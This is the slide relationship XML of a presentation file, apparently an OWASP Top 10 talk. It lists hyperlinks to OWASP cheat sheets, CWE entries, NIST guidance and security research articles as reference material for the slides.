Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/327.html" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/202.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bsi.bund.de/DE/Publikationen/TechnischeRichtlinien/tr02102/index_htm.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2"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owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ioactive.com/die-laughing-from-a-billion-laughs/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.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XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/xml/xml_dtd_intro.asp" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html"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Access_Control_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.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we.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tool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OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/388.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/16.html" TargetMode="Externa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hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/"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owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00200308_clientsidetemplateinjection" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html"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speakerdeck.com/pwntester/surviving-the-java-deserialization-apocalypse" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mbechler/marshalsec" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/502.html" TargetMode="Externa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OWASP_Proactive_Controls#4:_Validate_All_Inputs" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/cschneider4711/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016"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speakerdeck.com/pwntester/friday-the-13th-json-attacks" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide17.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Heartbleed" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/report/89bnfUyJ" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Map_Application_Architecture_(OTG-INFO-010)"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www.cvedetails.com/version-search.php" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/"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Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/images/7/70/ASDC12-The_Unfortunate_Reality_of_Insecure_Libraries.pdf" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices#What_is_a_Virtual_Patch.3F"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 TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#8:_Implement_Logging_and_Intrusion_Detection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xm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OWASP_Zed_Attack_Proxy_Project" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OTG-ERR-001)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final"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Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide18.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference"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Secure_Software_Contract_Annex_German" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat"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owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Germany" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Chapter" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.de/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide26.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/OWASPGLOBAL" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External"/><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hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.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20.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1.xml"/><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diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Security_Guide_For_CISOs" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml"/></Relationships>
</file>

